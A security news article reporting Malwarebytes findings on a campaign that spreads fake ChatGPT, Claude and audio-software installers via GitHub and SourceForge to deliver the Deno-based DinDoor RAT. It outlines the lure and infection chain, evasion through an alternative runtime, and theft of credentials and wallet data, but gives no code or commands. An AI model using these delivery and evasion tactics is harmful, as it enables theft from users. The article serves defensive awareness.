Fake Software on GitHub and SourceForge Distributes Deno-Based DinDoor RAT
Malwarebytes uncovers a campaign using fake installers for ChatGPT, Claude, and other software on GitHub and SourceForge to deliver the DinDoor RAT, which leverages the Deno runtime for stealth.
Malwarebytes researchers have identified a widespread malware campaign that distributes fake installers for popular software such as ChatGPT, Claude, AutoTune, and Kontakt through GitHub and SourceForge repositories. The malicious packages deliver a Deno-based backdoor called DinDoor, which ultimately deploys a remote access Trojan (RAT) capable of data exfiltration from browsers and cryptocurrency wallets.
The infection chain begins with compromised YouTube channels that promote fake software, directing viewers to malicious GitHub or SourceForge repositories. These repositories host MSI files or PowerShell scripts that, when executed, install the Deno JavaScript runtime via package managers like Scoop or WinGet. Deno is then used to execute the DinDoor RAT, which features a peer-to-peer communication mechanism that hides malicious traffic through Microsoft Edge.
The campaign has accumulated over 50,000 video views, targeting creators, AI enthusiasts, gamers, and technically inclined users who are more likely to download unofficial tools or cracked software. The fake repositories often ask users to copy and run a command in the terminal, which downloads and executes the malicious MSI. Malwarebytes observed multiple repositories impersonating legitimate software, including ZENOLOGY, Ableton Live, and GearUP.
Once installed, the DinDoor RAT can execute additional payloads, steal credentials and session cookies from browsers, and exfiltrate data from cryptocurrency wallets. The use of Deno, an alternative JavaScript runtime, helps the malware evade traditional detection methods that focus on Node.js or PowerShell-based threats. This technique mirrors recent trends where attackers abuse Bun and Deno to bypass security controls.
Malwarebytes reported the malicious repositories to GitHub, which quickly removed them. However, attackers are expected to create new accounts and repositories to continue the campaign. Users are advised to download software only from official vendor websites, avoid cracked or unofficial versions, and carefully inspect repository profiles and file signatures before execution.
The DinDoor campaign highlights the growing abuse of legitimate development platforms like GitHub and SourceForge for malware distribution. By leveraging trusted infrastructure and alternative runtimes, attackers increase the credibility of their lures and reduce the likelihood of detection. Organizations and individuals should remain vigilant and implement strict download policies to mitigate such threats.